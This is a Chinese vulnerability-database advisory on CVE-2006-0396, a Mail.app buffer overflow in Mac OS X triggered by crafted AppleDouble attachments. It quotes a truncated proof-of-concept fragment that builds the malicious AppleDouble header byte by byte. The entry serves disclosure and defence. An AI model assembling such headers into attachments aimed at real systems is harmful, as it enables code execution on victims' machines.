Apple Mac OS X邮件消息附件远程缓冲区溢出漏洞 CVE-2006-0396 CNNVD-200603-268

5.1 AV AC AU C I A
发布: 2006-03-14
修订: 2018-10-19

Apple Mac OS X是苹果家族电脑所使用的操作系统。 Apple Mac OS X的2006-001安全更新存在缓冲区溢出漏洞,攻击者可能利用此漏洞在机器上执行任意指令。 在安装Apple的2006-001安全更新后,Mail.app中存在缓冲区溢出漏洞。攻击者可以发送包含有AppleDouble头信息的特制MIME封装Macintosh文件来触发这个漏洞。例如: \"\x00\x05\x16\x07\". # AppleDouble Magic Number \"\x00\x02\x00\x00\". # Version 2 \"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\". # 16 Bytes of filler \"\x00\x03\x00\x00\". # Number of entries (3) \"\x00\x09\x00\x00\". # Entry ID 9 is for \'\'Finder Info\'\' \"\x00\x3e\x00\x00\". # Start of Finder Info data is at file offset 0x3e \"\x00\x0a\x00\x00\". # Length of Finder Info is 0x0a or 10 \"\x00\x03\x00\x00\". # Entry ID 3 is for \'\'Real Name\'\' \"\x00\x48\x00\x00\". # Start of Real Name data is at file offset 0x48 \"\x00\xf5\x00\x00\". # Length of Real Name is 0xf5 or 245 \"\x00\x02\x00\x00\". # Entry ID 2 is for \'\'Resource Fork\'\'\"\x01\x3d\x00\x00\". # Start of Resource Fork is at file offset 0x013d \"\x05\x3a\x00\x00\". # Length of Resource fork is 0x053a...

0%
当前有1条漏洞利用/PoC
当前有12条受影响产品信息